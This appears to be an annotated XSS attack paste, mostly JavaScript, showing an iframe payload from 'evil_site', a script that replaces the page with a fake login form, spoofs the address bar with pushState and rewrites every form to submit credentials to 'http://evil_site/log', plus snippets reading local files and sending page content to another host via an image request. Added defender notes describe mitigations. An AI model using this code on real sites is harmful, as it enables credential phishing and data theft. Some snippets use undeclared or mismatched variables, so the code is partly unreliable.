- @Abdelmoughite Eljoaydi
- /**
- <iframe src="http://evil_site/phishing.js"></iframe>
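- * This payload injects an iframe tag that will load the script located at "/phishing.js".
- * Let’s take a look at what phishing.js could contain.
- * Defender note: an injection like this depends on the application writing attacker-supplied markup into the page unencoded; output encoding at that point, plus a Content-Security-Policy that restricts script-src and frame-src, is the mitigation.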
- */
- // override(url): synchronously GETs `url` and assigns a non-empty response to document.innerHTML. The url passed in this paste is relative, so it resolves against the document the script is running in.
- function override(url) {
- var xhr_req = new XMLHttpRequest();
- xhr_req.open('GET', url, false); // third argument false: synchronous request
- xhr_req.onreadystatechange = function () {
- if (xhr_req.readyState == 4 && xhr_req.responseText != "") { // 4 = DONE; an empty body is ignored
- document.innerHTML = xhr_req.responseText; // assigns the fetched markup to an `innerHTML` property on the document object
- }
- }
- xhr_req.send(null);
- }
- // Calls override(url) with the application's own login form path, "LoginForm.jsp", as the content to display.
- override("/console/login/LoginForm.jsp"); // we can extend this exploitation to CSRF attacks.
- // Spoofing the current URI (the URL bar will show /console/login/LoginForm.jsp). pushState changes the displayed path without a navigation, so the address bar alone does not reveal the spoof to the user.
- var stateObj = { log: "login" };
- history.pushState(stateObj, document.getElementsByTagName("title")[0].innerHTML, "/console/login/LoginForm.jsp"); // arguments: state object, the current <title> markup as the title, the new path
- // Hooks every form so that submitted credentials go to "http://evil_site/log". Defender note: a Content-Security-Policy `form-action` directive restricts where forms may submit, and an off-origin form target is a useful detection signal.
- var forms = document.getElementsByTagName("form");
- for (index = 0; index < forms.length; index++) {
- void(forms[index].action = "http://evil_site/log"); // rewrites each form's action to the author's placeholder URL (plain HTTP, off-origin)
- }
- ==============================================================================================================================
- //Reading local files. (works only on Firefox) NOTE(review): the Firefox claim is the author's and is not demonstrated in this paste; confirm against current browser behaviour before relying on it.
- function _LFileAccess(_method,action,argv){ // _method: HTTP verb, action: URL, argv: request body; returns the response text
- req.open(_method,action,false); // `req` is not declared in this paste (presumably an XMLHttpRequest; confirm); false = synchronous
- if(_method=="POST") // only POST gets the form-encoded Content-Type header
- req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
- req.send(argv);
- return req.responseText;
- }
- var local_file=_LFileAccess("GET","file://localhost/C:/PATH/",null); // requests a file:// URL; "C:/PATH/" is the author's placeholder path
- dump(local_file); // dump() is not defined in this paste (presumably Firefox's non-standard debug output function; confirm)
- //Screen-capture of the current page state. NOTE(review): "screen-capture" is the author's label; what the code below sends is the response text of a request, not an image of the page.
- XMlHttpReq.open("GET","example.com",false); // this object is not declared in this paste; false = synchronous
- function getURL(s) { // despite the name, returns nothing: it makes the browser issue a GET for `s` by setting it as an image source
- var image = new Image();
- image.style.width = 0; // zero-sized; the image is also never attached to the document in this function
- image.style.height = 0;
- image.src = s; // assigning src is what starts the request
- }
- getURL("http://example.com/page.php?pagecopie="+xmlHttpReq.responseText); // sends the response text as a query-string value to another host. Defender note: a CSP `img-src` restriction limits image requests like this, and unusually long query strings on image requests are a detection signal.